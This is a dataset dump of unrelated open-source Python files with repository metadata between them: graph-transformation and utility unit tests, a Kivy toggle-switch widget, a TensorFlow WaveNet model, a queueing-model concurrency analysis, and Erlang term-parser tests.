('relu', 'output'),
]
ref_graph_node_attrs = {
'placeholder_0': {'shape': int64_array([3, 100, 100, 2]), 'type': 'Parameter', 'kind': 'op', 'op': 'Parameter'},
'placeholder_1': {'shape': int64_array([3, 100, 100, 2]), 'type': 'Parameter', 'kind': 'op', 'op': 'Parameter'},
'pow0_const': {
'type': 'Const', 'kind': 'op', 'op': 'Const', 'value': np.float32(2.0)
},
'pow1_const': {
'type': 'Const', 'kind': 'op', 'op': 'Const', 'value': np.float32(2.0)
},
'pow0': {'type': 'Power', 'kind': 'op', 'op': 'Pow'},
'pow1': {'type': 'Power', 'kind': 'op', 'op': 'Pow'},
'add': {'type': 'Add', 'kind': 'op', 'op': 'Add'},
'sqrt_const': {
'type': 'Const', 'kind': 'op', 'op': 'Const', 'value': np.float32(0.5)
},
'sqrt': {'type': 'Power', 'kind': 'op', 'op': 'Pow'},
'relu': {'type': 'ReLU', 'kind': 'op', 'op': 'ReLU'},
'output': {'type': None, 'value': None, 'kind': 'op', 'op': 'Result'},
}
ref_graph_edges = [
('placeholder_0', 'pow0', {'in': 0}),
('placeholder_1', 'pow1', {'in': 0}),
('pow0_const', 'pow0', {'in': 1}),
('pow1_const', 'pow1', {'in': 1}),
('pow0', 'add', {'in': 0}),
('pow1', 'add', {'in': 1}),
('add', 'sqrt', {'in': 0}),
('sqrt_const', 'sqrt', {'in': 1}),
('sqrt', 'relu'),
('relu', 'output'),
]
class ComplexAbsAfterComplexTest(unittest.TestCase):
def test_replacement(self):
graph = build_graph(nodes_attrs=graph_node_attrs, edges=graph_edges)
graph.stage = 'front'
ComplexAbsAfterComplex().find_and_replace_pattern(graph)
ref_graph = build_graph(nodes_attrs=ref_graph_node_attrs, edges=ref_graph_edges)
(flag, resp) = compare_graphs(graph, ref_graph, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
| 37.96
| 116
| 0.572181
|
6646ad1ed108db9b95d08f633cb32d82734f9546
| 6,511
|
py
|
Python
|
datadog_checks_base/tests/test_utils.py
|
remicalixte/integrations-core
|
b115e18c52820fe1a92495f538fdc14ddf83cfe1
|
[
"BSD-3-Clause"
] | 1
|
2021-03-24T13:00:14.000Z
|
2021-03-24T13:00:14.000Z
|
datadog_checks_base/tests/test_utils.py
|
remicalixte/integrations-core
|
b115e18c52820fe1a92495f538fdc14ddf83cfe1
|
[
"BSD-3-Clause"
] | null | null | null |
datadog_checks_base/tests/test_utils.py
|
remicalixte/integrations-core
|
b115e18c52820fe1a92495f538fdc14ddf83cfe1
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
from decimal import ROUND_HALF_DOWN
import mock
import pytest
from six import PY3
from datadog_checks.base.utils.common import ensure_bytes, ensure_unicode, pattern_filter, round_value, to_native_string
from datadog_checks.base.utils.containers import iter_unique
from datadog_checks.base.utils.limiter import Limiter
from datadog_checks.base.utils.secrets import SecretsSanitizer
class Item:
def __init__(self, name):
self.name = name
def __eq__(self, other):
return self.name == other.name
class TestPatternFilter:
def test_no_items(self):
items = []
whitelist = ['mock']
assert pattern_filter(items, whitelist=whitelist) == []
def test_no_patterns(self):
items = ['mock']
assert pattern_filter(items) is items
def test_multiple_matches_whitelist(self):
items = ['abc', 'def', 'abcdef', 'ghi']
whitelist = ['abc', 'def']
assert pattern_filter(items, whitelist=whitelist) == ['abc', 'def', 'abcdef']
def test_multiple_matches_blacklist(self):
items = ['abc', 'def', 'abcdef', 'ghi']
blacklist = ['abc', 'def']
assert pattern_filter(items, blacklist=blacklist) == ['ghi']
def test_whitelist_blacklist(self):
items = ['abc', 'def', 'abcdef', 'ghi']
whitelist = ['def']
blacklist = ['abc']
assert pattern_filter(items, whitelist=whitelist, blacklist=blacklist) == ['def']
def test_key_function(self):
items = [Item('abc'), Item('def'), Item('abcdef'), Item('ghi')]
whitelist = ['abc', 'def']
assert pattern_filter(items, whitelist=whitelist, key=lambda item: item.name) == [
Item('abc'),
Item('def'),
Item('abcdef'),
]
class TestLimiter:
def test_no_uid(self):
warning = mock.MagicMock()
limiter = Limiter("my_check", "names", 10, warning_func=warning)
for _ in range(0, 10):
assert limiter.is_reached() is False
assert limiter.get_status() == (10, 10, False)
# Reach limit
assert limiter.is_reached() is True
assert limiter.get_status() == (11, 10, True)
# Make sure warning is only sent once
assert limiter.is_reached() is True
warning.assert_called_once_with("Check %s exceeded limit of %s %s, ignoring next ones", "my_check", 10, "names")
def test_with_uid(self):
warning = mock.MagicMock()
limiter = Limiter("my_check", "names", 10, warning_func=warning)
for _ in range(0, 20):
assert limiter.is_reached("dummy1") is False
assert limiter.get_status() == (1, 10, False)
for _ in range(0, 20):
assert limiter.is_reached("dummy2") is False
assert limiter.get_status() == (2, 10, False)
warning.assert_not_called()
def test_mixed(self):
limiter = Limiter("my_check", "names", 10)
for _ in range(0, 20):
assert limiter.is_reached("dummy1") is False
assert limiter.get_status() == (1, 10, False)
for _ in range(0, 5):
assert limiter.is_reached() is False
assert limiter.get_status() == (6, 10, False)
def test_reset(self):
limiter = Limiter("my_check", "names", 10)
for _ in range(1, 20):
limiter.is_reached("dummy1")
assert limiter.get_status() == (1, 10, False)
limiter.reset()
assert limiter.get_status() == (0, 10, False)
assert limiter.is_reached("dummy1") is False
assert limiter.get_status() == (1, 10, False)
class TestRounding:
def test_round_half_up(self):
assert round_value(3.5) == 4.0
def test_round_modify_method(self):
assert round_value(3.5, rounding_method=ROUND_HALF_DOWN) == 3.0
def test_round_modify_sig_digits(self):
assert round_value(2.555, precision=2) == 2.560
assert round_value(4.2345, precision=2) == 4.23
assert round_value(4.2345, precision=3) == 4.235
class TestContainers:
def test_iter_unique(self):
custom_queries = [
{
'metric_prefix': 'database',
'tags': ['test:database'],
'query': 'SELECT thing1, thing2 FROM TABLE',
'columns': [{'name': 'database.metric', 'type': 'count'}, {'name': 'tablespace', 'type': 'tag'}],
},
{
'tags': ['test:database'],
'columns': [{'name': 'tablespace', 'type': 'tag'}, {'name': 'database.metric', 'type': 'count'}],
'query': 'SELECT thing1, thing2 FROM TABLE',
'metric_prefix': 'database',
},
]
assert len(list(iter_unique(custom_queries))) == 1
class TestBytesUnicode:
@pytest.mark.skipif(PY3, reason="Python 3 does not support explicit bytestring with special characters")
def test_ensure_bytes_py2(self):
assert ensure_bytes('éâû') == 'éâû'
assert ensure_bytes(u'éâû') == 'éâû'
def test_ensure_bytes(self):
assert ensure_bytes('qwerty') == b'qwerty'
def test_ensure_unicode(self):
assert ensure_unicode('éâû') == u'éâû'
assert ensure_unicode(u'éâû') == u'éâû'
def test_to_native_string(self):
# type: () -> None
text = u'éâû'
binary = text.encode('utf-8')
if PY3:
assert to_native_string(binary) == text
else:
assert to_native_string(binary) == binary
class TestSecretsSanitizer:
def test_default(self):
# type: () -> None
secret = 's3kr3t'
sanitizer = SecretsSanitizer()
assert sanitizer.sanitize(secret) == secret
def test_sanitize(self):
# type: () -> None
secret = 's3kr3t'
sanitizer = SecretsSanitizer()
sanitizer.register(secret)
assert all(letter == '*' for letter in sanitizer.sanitize(secret))
def test_sanitize_multiple(self):
# type: () -> None
pwd1 = 's3kr3t'
pwd2 = 'admin123'
sanitizer = SecretsSanitizer()
sanitizer.register(pwd1)
sanitizer.register(pwd2)
message = 'Could not authenticate with password {}, did you try {}?'.format(pwd1, pwd2)
sanitized = sanitizer.sanitize(message)
assert pwd1 not in sanitized
assert pwd2 not in sanitized
| 32.232673
| 120
| 0.603748
|
1fe5af9bf8bd63e082c87ac0e69e4b9cd27a9b1e
| 2,027
|
py
|
Python
|
kivyx/selection.py
|
yunus-ceyhan/kivyx
|
f4348eb8c00ad62346b827d1ab6197f8f84cde8e
|
[
"MIT"
] | 1
|
2022-03-28T07:27:32.000Z
|
2022-03-28T07:27:32.000Z
|
kivyx/selection.py
|
yunus-ceyhan/kivyx
|
f4348eb8c00ad62346b827d1ab6197f8f84cde8e
|
[
"MIT"
] | null | null | null |
kivyx/selection.py
|
yunus-ceyhan/kivyx
|
f4348eb8c00ad62346b827d1ab6197f8f84cde8e
|
[
"MIT"
] | null | null | null |
"""
<MainApp>:
XSwitch:
pos_hint: {"center_x": .5, "center_y": .5}
active: True
style: "m3"
"""
from kivyx.behavior import CircularBehavior
from kivy.clock import Clock
from kivy.lang import Builder
from kivyx.boxlayout import XBoxLayout
from kivy.properties import ColorProperty, BooleanProperty, OptionProperty
from kivy.metrics import dp
from kivy.animation import Animation
Builder.load_string("""
<XSwitch>:
size_hint: None,None
size: (dp(36),dp(16) if root.style == "m2" else dp(22))
radius: [dp(8),] if root.style == "m2" else [dp(10),]
bg_color: root.back_color
on_press: root.change_status()
padding: [0,0,0,0] if root.style == "m2" else [dp(1),0,0,0]
XWidget:
id: ic
size_hint: None,None
size: dp(20),dp(20)
bg_color: root.toggle_color
radius: [dp(180),]
pos_hint: {"center_y": .5}
""")
class XSwitch(CircularBehavior, XBoxLayout):
    toggle_color = ColorProperty()
back_color = ColorProperty()
active = BooleanProperty(False)
style = OptionProperty("m2", options = ["m2","m3"])
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.toggle_color = self.card_color
self.back_color = self.disabled_color
Clock.schedule_once(self.change_status)
def change_status(self,*args):
if self.active:
anim = Animation(padding = [dp(16),0,0,0] if self.style == "m2" else [dp(15),0,0,0], duration = 0.2)
anim.start(self)
anim.bind(on_complete = self.change_color)
else:
anim = Animation(padding = [0,0,0,0] if self.style == "m2" else [dp(1),0,0,0], duration = 0.2)
anim.start(self)
anim.bind(on_complete = self.change_color)
def change_color(self,*args):
if not self.active:
self.back_color = self.disabled_color
self.active = True
else:
self.back_color = self.accent_color
self.active = False
| 30.712121
| 112
| 0.614702
|
c32cba98ebd9e0cff698158bc310d0ef3b653be1
| 9,223
|
py
|
Python
|
model_causal.py
|
ljuvela/GELP
|
6d1084aa7471530224c8f0498efcce696069ec87
|
[
"Apache-2.0"
] | 27
|
2019-07-02T19:21:32.000Z
|
2021-04-03T21:09:31.000Z
|
model_causal.py
|
ljuvela/GELP
|
6d1084aa7471530224c8f0498efcce696069ec87
|
[
"Apache-2.0"
] | 1
|
2021-04-20T03:05:17.000Z
|
2021-04-21T10:21:07.000Z
|
model_causal.py
|
ljuvela/GELP
|
6d1084aa7471530224c8f0498efcce696069ec87
|
[
"Apache-2.0"
] | 6
|
2020-08-10T01:39:41.000Z
|
2021-07-28T13:45:53.000Z
|
from __future__ import division, print_function
__author__ = "Lauri Juvela, lauri.juvela@aalto.fi"
import os
import sys
import math
import numpy as np
import tensorflow as tf
_FLOATX = tf.float32 # todo: move to lib/precision.py
def get_weight_variable(name, shape=None, initial_value=None):
if shape is None:
return tf.get_variable(name)
if initial_value is None:
initializer = tf.contrib.layers.xavier_initializer_conv2d()
W = tf.get_variable(name, shape=shape, dtype=_FLOATX, initializer=initializer)
else:
W = tf.Variable(initial_value)
return W
def get_bias_variable(name, shape=None, initializer=tf.constant_initializer(value=0.0, dtype=_FLOATX)):
return tf.get_variable(name, shape=shape, dtype=_FLOATX, initializer=initializer)
def convolution(X, W, dilation=1, causal=True):
"""
Applies 1D convolution
Args:
X: input tensor of shape (batch, timesteps, in_channels)
W: weight tensor of shape (filter_width, in_channels, out_channels)
dilation: int value for dilation
causal: bool flag for causal convolution
Returns:
Y: output tensor of shape (batch, timesteps, out_channels)
"""
if causal:
fw = tf.shape(W)[0]
pad = (fw - 1) * dilation
Y = tf.pad(X, paddings=[[0,0], [pad,0], [0,0]])
Y = tf.nn.convolution(Y, W, padding="VALID", dilation_rate=[dilation])
else:
Y = tf.nn.convolution(X, W, padding="SAME", dilation_rate=[dilation])
return Y
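# A minimal worked example of the causal padding above (illustrative, not part of
# the original module): with filter_width fw = 3 and dilation = 4, pad = (3 - 1) * 4 = 8
# zeros are prepended along the time axis, so the "VALID" convolution returns a
# sequence of the original length whose value at step t depends only on inputs <= t.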
class WaveNet():
"""
TensorFlow WaveNet object
Initialization Args:
name: string used for variable namespacing
user is responsible for unique names if multiple models are used
residual_channels: number of channels used in the convolution layers
        postnet_channels: number of channels in the post-processing module
        filter_width: width of the convolution filters
        dilations: list of integers containing the dilation pattern
            list length determines the number of dilated blocks used
        input_channels: number of channels in the input signal
causal: if True, use causal convolutions everywhere in the network
conv_block_gate: if True, use gated convolutions in the dilated blocks
conv_block_affine_out: if True, apply a 1x1 convolution in dilated blocks before the residual connection
Functions:
Members:
"""
def __init__(self,
name,
residual_channels=64,
postnet_channels=64,
filter_width=3,
dilations=[1, 2, 4, 8, 1, 2, 4, 8],
input_channels=1,
output_channels=1,
cond_channels=None,
cond_embed_dim = 64,
causal=True,
conv_block_gate=True,
conv_block_affine_out=True,
add_noise_at_each_layer=False
):
self.input_channels = input_channels
self.output_channels = output_channels
self.filter_width = filter_width
self.dilations = dilations
self.residual_channels = residual_channels
self.postnet_channels = postnet_channels
self.causal = causal
self.conv_block_gate = conv_block_gate
self.conv_block_affine_out = conv_block_affine_out
self.add_noise_at_each_layer = add_noise_at_each_layer
if cond_channels is not None:
self._use_cond = True
self.cond_embed_dim = cond_embed_dim
self.cond_channels = cond_channels
else:
self._use_cond = False
self._name = name
def get_receptive_field(self):
receptive_field = (self.filter_width - 1) * sum(self.dilations) + 1 # due to dilation layers
receptive_field += self.filter_width - 1 # due to input layer (if not 1x1)
if not self.causal:
receptive_field = 2 * receptive_field - 1
return receptive_field
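    # Worked example (illustrative): with the default constructor arguments
    # (filter_width=3, dilations=[1, 2, 4, 8, 1, 2, 4, 8], causal=True) this gives
    # (3 - 1) * 30 + 1 = 61 samples from the dilated stack plus 2 from the input
    # layer, i.e. a receptive field of 63 samples; with causal=False it doubles
    # to 2 * 63 - 1 = 125 samples.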
def get_variable_list(self):
return tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=self._name)
def _input_layer(self, main_input):
with tf.variable_scope('input_layer'):
r = self.residual_channels
fw = self.filter_width
W = get_weight_variable('W', (fw, self.input_channels, r))
b = get_bias_variable('b', (r))
X = main_input
Y = convolution(X, W, causal=self.causal)
Y += b
Y = tf.tanh(Y)
return Y
def _embed_cond(self, cond_input):
with tf.variable_scope('embed_cond'):
W = get_weight_variable('W', (1, self.cond_channels, self.cond_embed_dim))
b = get_bias_variable('b', (self.cond_embed_dim))
Y = convolution(cond_input, W, causal=self.causal) # 1x1 convolution
Y += b
return tf.tanh(Y)
def _conv_module(self, main_input, module_idx, dilation, cond_input=None):
with tf.variable_scope('conv_modules'):
with tf.variable_scope('module{}'.format(module_idx)):
fw = self.filter_width
r = self.residual_channels
X = main_input
if self.conv_block_gate:
# convolution
W = get_weight_variable('filter_gate_W', (fw, r, 2*r))
b = get_bias_variable('filter_gate_b', (2*r))
Y = convolution(X, W,
dilation=dilation,
causal=self.causal)
Y += b
# conditioning
if self._use_cond:
V = get_weight_variable('cond_filter_gate_W',
(1, self.cond_embed_dim, 2*r))
b = get_bias_variable('cond_filter_gate_b', (2*r))
C = convolution(cond_input, V) # 1x1 convolution
Y += C + b
if self.add_noise_at_each_layer:
W = get_weight_variable('noise_scaling_W',
(1, 1, r))
Z = tf.random_normal(shape=tf.shape(Y[..., :r]))
Y += tf.concat([W * Z, tf.zeros_like(Y[..., r:])], axis=-1)
# filter and gate
Y = tf.tanh(Y[..., :r]) * tf.sigmoid(Y[..., r:])
else:
# convolution
W = get_weight_variable('filter_gate_W', (fw, r, r))
b = get_bias_variable('filter_gate_b', (r))
Y = convolution(X, W,
dilation=dilation,
causal=self.causal)
Y += b
# conditioning
if self._use_cond:
V = get_weight_variable('cond_filter_gate_W',
(1, self.cond_embed_dim, r))
b = get_bias_variable('cond_filter_gate_b', (r))
C = convolution(cond_input, V) # 1x1 convolution
Y += C + b
if self.add_noise_at_each_layer:
W = get_weight_variable('noise_scaling_W',
(1, 1, r))
Z = tf.random_normal(shape=tf.shape(Y))
Y += W * Z
# activation
Y = tf.tanh(Y)
skip_out = Y
if self.conv_block_affine_out:
W = get_weight_variable('output_W', (1, r, r))
b = get_bias_variable('output_b', (r))
Y = convolution(Y, W) + b
# residual connection
Y += X
return Y, skip_out
def _postproc_module(self, residual_module_outputs):
with tf.variable_scope('postproc_module'):
s = self.postnet_channels
r = self.residual_channels
d = len(self.dilations)
# concat and convolve
W1 = get_weight_variable('W1', (1, d*r, s))
b1 = get_bias_variable('b1', s)
X = tf.concat(residual_module_outputs, axis=-1) # concat along channel dim
Y = convolution(X, W1)
Y += b1
Y = tf.nn.tanh(Y)
# output layer
W2 = get_weight_variable('W2', (1, s, self.output_channels))
b2 = get_bias_variable('b2', self.output_channels)
Y = convolution(Y, W2)
Y += b2
return Y
def forward_pass(self, X_input, cond_input=None):
skip_outputs = []
with tf.variable_scope(self._name, reuse=tf.AUTO_REUSE):
if self._use_cond:
C = self._embed_cond(cond_input)
else:
C = None
R = self._input_layer(X_input)
X = R
for i, dilation in enumerate(self.dilations):
X, skip = self._conv_module(X, i, dilation, cond_input=C)
skip_outputs.append(skip)
Y = self._postproc_module(skip_outputs)
return Y
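# A minimal usage sketch (not part of the original module), assuming TensorFlow 1.x
# as used throughout this file; the name and shapes below are illustrative only.
if __name__ == "__main__":
    wavenet = WaveNet(name='wavenet_demo', input_channels=1, output_channels=1)
    x_in = tf.placeholder(_FLOATX, shape=(None, 1000, 1))  # (batch, time, channels)
    y_out = wavenet.forward_pass(x_in)  # same time length, one output channel
    print('receptive field in samples:', wavenet.get_receptive_field())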
| 34.543071
| 117
| 0.541364
|
0c1c909331ca19bc05feaf4cf513f360b5d269e9
| 2,818
|
py
|
Python
|
model/analyze/01-single-analysis.py
|
pacslab/conc-value-perf-modelling
|
156320c3e9669149b10ea54d5ac0a1de8d0a7013
|
[
"MIT"
] | null | null | null |
model/analyze/01-single-analysis.py
|
pacslab/conc-value-perf-modelling
|
156320c3e9669149b10ea54d5ac0a1de8d0a7013
|
[
"MIT"
] | null | null | null |
model/analyze/01-single-analysis.py
|
pacslab/conc-value-perf-modelling
|
156320c3e9669149b10ea54d5ac0a1de8d0a7013
|
[
"MIT"
] | null | null | null |
# %% Imports
import sys
import numpy as np
import matplotlib.pyplot as plt
import scipy as sp
import pandas as pd
import itertools
from tqdm.auto import tqdm
# import concperf by adding its path
sys.path.append('..')
from concperf import single_model
from concperf import utility
# %% create config
config = {
"base_service_time": 1,
"alpha": 1,
"max_conc": 100,
"arrival_rate_server": 1,
}
figs_folder = 'figs/'
results_folder = 'results/'
# %% helper for solving the model for a specific configuration
def process_config(config, arrival_rate, alpha):
model_config = { **config }
model_config.update({
"arrival_rate_server": arrival_rate,
"alpha": alpha,
})
single_coder = single_model.StateCoder(config=model_config)
Q = single_model.get_single_container_q(single_coder, config=model_config)
# for steady-state probability:
# req_count_prob = utility.solve_CTMC(Q)
# for transient solution:
# our initial state
state_count = Q.shape[0]
init_state = np.zeros(state_count)
init_state[0] = 1
max_t = 60
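    # For a CTMC with infinitesimal generator Q, the transient distribution obeys
    # dp/dt = p @ Q, so p(max_t) = p(0) @ expm(Q * max_t); the next line evaluates
    # that matrix exponential starting from the empty-system state.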
state_probs = init_state @ sp.linalg.expm(Q * max_t)
state_req_counts = [s[0] for s in single_coder.get_state_list()]
req_count_avg = (state_probs * state_req_counts).sum()
return {
"state_probs": state_probs,
"state_req_counts": state_req_counts,
"req_count_avg": req_count_avg,
"arrival_rate": arrival_rate,
"alpha": alpha,
}
# print the keys
process_config(config, 1, 1).keys()
# %% process for different values
from concurrent.futures import ProcessPoolExecutor, as_completed
if __name__ == "__main__":
arrival_rates = np.linspace(0.1, 20, 100)
alphas = [0.01, 0.05, 0.1, 0.5, 1]
df_data = itertools.product(arrival_rates, alphas)
futures = []
with ProcessPoolExecutor(max_workers=1) as pool:
for arrival_rate, alpha in df_data:
future = pool.submit(process_config, config, arrival_rate, alpha)
futures.append(future)
# get the future results as they are completed
results = [f.result() for f in as_completed(futures)]
# %% create plots
def save_fig(figname):
plt.savefig(figs_folder + figname + ".png", dpi=600)
plt.savefig(figs_folder + figname + ".pdf")
if __name__ == "__main__":
df = pd.DataFrame(results)
df.to_csv(results_folder + '01_conc_vs_arrival_alpha.csv')
for alpha in alphas:
sub_df = df[df['alpha'] == alpha]
sub_df = sub_df.sort_values('arrival_rate')
plt.plot(sub_df['arrival_rate'], sub_df['req_count_avg'], label=f"Alpha={alpha}")
plt.ylim((0, 80))
plt.ylabel('Concurrency')
plt.xlabel('Arrival Rate Per Container')
plt.grid(True)
plt.legend()
save_fig('01_conc_vs_arrival_alpha')
| 28.464646
| 89
| 0.678141
|
162942e762bda5d0c98cb313a3eb19a92d897ebd
| 10,341
|
py
|
Python
|
twotp/test/test_parser.py
|
lunay001/TwOTP
|
8c5d6437f30678926b87c3b015b5aa4df70f2349
|
[
"MIT"
] | null | null | null |
twotp/test/test_parser.py
|
lunay001/TwOTP
|
8c5d6437f30678926b87c3b015b5aa4df70f2349
|
[
"MIT"
] | null | null | null |
twotp/test/test_parser.py
|
lunay001/TwOTP
|
8c5d6437f30678926b87c3b015b5aa4df70f2349
|
[
"MIT"
] | null | null | null |
# Copyright (c) 2007-2009 Thomas Herve <therve@free.fr>.
# See LICENSE for details.
"""
Parser tests.
"""
from twotp.term import Atom, Tuple, Pid, Reference, Integer, List
from twotp.term import Float, Port, Binary, Fun, NewFun, Export, BitBinary
from twotp.parser import Parser, RemainingDataError, UnhandledCode
from twotp.test.util import TestCase
class ParseTestCase(TestCase):
"""
Test parsing various data.
"""
def setUp(self):
"""
Create a parser instance.
"""
self.parser = Parser()
def test_parseAtom(self):
"""
Try to parse the binary representation of an atom.
"""
self.assertEqual(
self.parser.binaryToTerm("d\x00\x03foo"), (Atom("foo"), ""))
def test_parseString(self):
"""
Try to parse the binary representation of a short string object.
"""
self.assertEqual(
self.parser.binaryToTerm("k\x00\x04dang"),
([100, 97, 110, 103], ""))
def test_parseNil(self):
"""
Try to parse NIL value.
"""
self.assertEqual(self.parser.binaryToTerm("j"), (List([]), ""))
def test_parseList(self):
"""
Try to parse a list of integers.
"""
self.assertEqual(
self.parser.binaryToTerm("l\x00\x00\x00\x02a\x01a\x02j"),
(List([1, 2]), ""))
def test_parseSmallTuple(self):
"""
Test parsing a small tuple of integer values.
"""
self.assertEqual(
self.parser.binaryToTerm("h\x02a\x05a\x04"), (Tuple([5, 4]), ""))
def test_parseLargeTuple(self):
"""
Try parsing a large tuple of integers.
"""
self.assertEqual(
self.parser.binaryToTerm("i\x00\x00\x00\x02a\x05a\x04"),
(Tuple([5, 4]), ""))
def test_parseLargeBig(self):
"""
Try parsing a positive and negative big integer. The only difference
between the two binary values is the sign bit.
"""
self.assertEqual(
self.parser.binaryToTerm("o\x00\x00\x00\x04\x00\x01\x02\x03\x04"),
(Integer(67305985), ""))
self.assertEqual(
self.parser.binaryToTerm("o\x00\x00\x00\x04\x01\x01\x02\x03\x04"),
(Integer(-67305985), ""))
def test_parseSmallBig(self):
"""
Try parsing a positive and negative small big integer. The only
difference between the two binary values is the sign bit.
"""
self.assertEqual(self.parser.binaryToTerm(
"n\x04\x00\x01\x02\x03\x04"), (Integer(67305985), ""))
self.assertEqual(self.parser.binaryToTerm(
"n\x04\x01\x01\x02\x03\x04"), (Integer(-67305985), ""))
def test_parseFloat(self):
"""
Test parsing a float null terminated.
"""
self.assertEqual(
self.parser.binaryToTerm(
"c\x31\x32\x2e\x33\x34\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00"),
(Float(12.34), ""))
def test_parseBigFloat(self):
"""
Try to parse a float without null character.
"""
self.assertEqual(
self.parser.binaryToTerm(
"c\x31\x32\x2e\x33\x34\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32\x32"
"\x32\x32\x32\x32\x32\x32\x32"),
(Float(12.34222222222222222222222222222), ""))
self.assertEqual(
self.parser.binaryToTerm("c-5.6779999999999999360"
"5e+00\x00\x00\x00\x00"),
(Float(-5.678), ""))
def test_parseInteger(self):
"""
Test parsing a standard integer on 32 bits.
"""
self.assertEqual(
self.parser.binaryToTerm("b\x00\x00\x00\x0f"), (Integer(15), ""))
self.assertEqual(
self.parser.binaryToTerm("b\xff\xff\xff\xff"), (Integer(-1), ""))
self.assertEqual(
self.parser.binaryToTerm("b\xff\xff\xff\xfe"), (Integer(-2), ""))
def test_parseSmallInteger(self):
"""
Try to parse a small integer on 1 byte.
"""
self.assertEqual(self.parser.binaryToTerm("a\x0e"), (Integer(14), ""))
def test_parseNewReference(self):
"""
Parse a new reference binary representation: the reference ID is an
array of integers.
"""
r = Reference(Atom('bar'), [3, 4], 1)
self.assertEqual(
self.parser.binaryToTerm("r\x00\x02d\x00\x03bar"
"\x01\x00\x00\x00\x03\x00\x00\x00\x04"),
(r, ""))
def test_parseReference(self):
"""
Parse a reference binary representation: the reference ID is only an
integer.
"""
r = Reference(Atom('foo'), 5, 1)
self.assertEqual(
self.parser.binaryToTerm("ed\x00\x03foo"
"\x00\x00\x00\x05\x01"),
(r, ""))
def test_parsePort(self):
"""
Parse a Port binary representation.
"""
r = Port(Atom('egg'), 12, 0)
self.assertEqual(
self.parser.binaryToTerm("fd\x00\x03egg\x00\x00\x00\x0c\x04"),
(r, ""))
def test_parseBinary(self):
"""
Parse a binary object representation.
"""
self.assertEqual(
self.parser.binaryToTerm("m\x00\x00\x00\x03egg"),
(Binary("egg"), ""))
def test_parseFun(self):
"""
Try to parse a Fun object.
"""
f = Fun(Pid(Atom('foo'), 1234, 56, 2), Atom("spam"), 12, 34,
[Atom("bar"), Atom("bim")])
self.assertEqual(
self.parser.binaryToTerm(
"u\x00\x00\x00\x02gd\x00\x03foo"
"\x00\x00\x04\xd2\x00\x00\x008\x02d\x00\x04spama\x0ca\x22"
"d\x00\x03bard\x00\x03bim"),
(f, ""))
def test_parseNewFun(self):
"""
Try to parse a NewFun object: it has specific ID fields.
"""
f = NewFun(Pid(Atom('foo'), 1234, 56, 2), Atom("spam"), 1,
'1234567890123456', 1, 2, 12, 34,
[Atom("bar"), Atom("bim")])
self.assertEqual(
self.parser.binaryToTerm(
"p\x00\x00\x00\x02\x01"
"1234567890123456\x00\x00\x00\x01\x00\x00\x00\x02d\x00\x04spam"
"a\x0ca\x22gd\x00\x03foo\x00\x00\x04\xd2\x00\x00\x008\x02"
"d\x00\x03bard\x00\x03bim"),
(f, ""))
def test_parseNewCache(self):
"""
Try to parse a NewCache object: it should correctly extract it and
put it in the cache.
"""
# This doesn't put it in the cache
a = Atom("spam")
self.assertEqual(
self.parser.binaryToTerm("N\x03\x00\x04spam"), (a, ""))
# Retrieve the value from cache
b = Atom(None, 3)
self.assertEqual(a, b)
def test_parseCachedAtom(self):
"""
Try to parse a Cached object: if not in the cache, this should raise
an exception, and if found it should retrieve it.
"""
self.assertRaises(KeyError, self.parser.binaryToTerm, "C\x08")
a = Atom("foo", 8)
self.assertEqual(self.parser.binaryToTerm("C\x08"), (a, ""))
def test_unhandledCode(self):
"""
Check that trying to parse invalid data raises an exception.
"""
self.assertRaises(UnhandledCode, self.parser.binaryToTerm, "Dfoo")
def test_parseVersion(self):
"""
Version shouldn't be managed by the parser
"""
self.assertRaises(RuntimeError, self.parser.binaryToTerm, "\x83foo")
def test_parseExport(self):
"""
Test parsing an export term.
"""
e = Export(Atom("bar"), Atom("foo"), Integer(2))
self.assertEqual(
self.parser.binaryToTerm("qd\x00\x03bard\x00\x03fooa\x02"),
(e, ""))
def test_parseBitBinary(self):
"""
Test parsing a bit binary object.
"""
b = BitBinary("\x04\x04\x04", 19)
self.assertEqual(
self.parser.binaryToTerm("M\x00\x00\x00\x03\x13\x04\x04\x04"),
(b, ""))
def test_parseDict(self):
"""
Test parsing a dict object.
"""
data = (
"\x83h\td\x00\x04dicta\x02a\x10a\x10a\x08aPa0h\x10jjjjjjjjjjjjjjjj"
"h\x01h\x10l\x00\x00\x00\x01l\x00\x00\x00\x02d\x00\x04spama\x01j"
"jl\x00\x00\x00\x01l\x00\x00\x00\x02d\x00\x03fook\x00\x03bar"
"jjjjjjjjjjjjjjjj")
self.assertEqual(
list(self.parser.binaryToTerms(data)),
[{Atom("foo"): [98, 97, 114], Atom("spam"): 1}])
def test_parseSet(self):
"""
Test parsing a set object.
"""
data = (
"\x83h\td\x00\x03seta\x02a\x10a\x10a\x08aPa0h\x10jjjjjjjjjjjjjjjj"
"h\x01h\x10l\x00\x00\x00\x01d\x00\x03barjl\x00\x00\x00\x01d\x00"
"\x03foojjjjjjjjjjjjjjj")
self.assertEqual(
list(self.parser.binaryToTerms(data)),
[set([Atom("bar"), Atom("foo")])])
def test_binaryToTerms(self):
"""
Try to parse a full binary stream.
"""
self.assertEqual(
list(self.parser.binaryToTerms("\x83d\x00\x03foo")),
[Atom("foo")])
def test_remainingData(self):
"""
If too much data is given, it should raise a C{RemainingDataError}
exception.
"""
self.assertRaises(
RemainingDataError, list,
self.parser.binaryToTerms("\x83d\x00\x03foo\x01"))
def test_compressedData(self):
"""
The parser is able to handle compressed data.
"""
self.assertEqual(
self.parser.binaryToTerm("P\x00\x00\x00\x12x\x9c\xcbf\xe0\xaf@"
"\x05\x00@\xc8\x07\x83"),
([120] * 15, ""))
def test_parseNewFloat(self):
"""
Try to parse a new float.
"""
self.assertEqual(
self.parser.binaryToTerm('F?\xf3\xae\x14z\xe1G\xae'), (1.23, ""))
| 30.325513
| 79
| 0.54163
|
be17390c79761367254aa42e4546bd6b40e5b260
| 2,010
|
py
|
Python
|
messungen/noverplot.py
|
tihmstar/gido_public
|
dcc523603b9a27b37752211715a10e30b51ce812
|
[
"Unlicense"
